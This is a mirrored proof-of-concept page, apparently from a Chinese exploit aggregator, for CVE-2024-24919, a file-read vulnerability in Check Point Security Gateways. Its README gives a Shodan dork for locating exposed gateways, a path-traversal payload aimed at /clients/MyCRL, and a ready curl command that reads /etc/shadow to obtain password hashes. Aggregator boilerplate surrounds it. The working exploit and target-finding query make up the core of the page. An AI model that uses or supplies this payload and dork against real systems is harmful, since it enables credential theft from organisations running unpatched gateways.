POC详情: 349ec51ea1d62c2b792958a2b7f558abf6b795c5

来源
https://github.com/sar-3mar/CVE-2024-24919_POC
关联漏洞
标题: Check Point Security Gateways 安全漏洞 (CVE-2024-24919)
描述:Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关。 Check Point Security Gateways 存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。
描述
It's Proof of Concept on CVE-2024-24919-POC , i made it after it's discoverd
介绍
# CVE-2024-24919_POC
It's Proof of Concept on CVE-2024-24919-POC , i made it after it's discoverd 

CVE-2024-24919 Checkpoint security gateway information disclosure vulnerability .
U can see it in [Notion-CVE-2024-24919_POC](https://sar-3mar.notion.site/CVE-2024-24919_POC-7b5740493c574ed7b8c6c078b9900a55)

## Shodan dork:
> title:"Check Point" "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"

## **Payload**
  > aCSHELL/../../../../../../../etc/shadow

> - **in path**
    💡 https://Host/clients/MyCRL
     > Replace Host by Original IP
    

###  **Command in Terminal**
   by curl to take a shadow for passes
  > curl --path-as-is -i -s -k -X $'POST' -H $'Host: 127.0.0.1' -H $'Content-Length: 39' -H $'Connection: keep-alive' --data-binary $'aCSHELL/../../../../../../../etc/shadow' $ 'https://127.0.0.1/clients/MyCRL'
 

### if u need more info go to notion at first .


**_see more write-ups_**
[Notion-Link-Write-ups](https://www.notion.so/sar-3mar/WriteUps-601a1b16bac247c2bf4bd915aadee5e5
)

**_contact with me_** [clickhere](https://sar-3mar.notion.site/Concat-784f7e83fd97489b9772ee0bcb41d25d?pvs=25)
文件快照

 [4.0K]  /data/pocs/349ec51ea1d62c2b792958a2b7f558abf6b795c5
└── [1.1K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。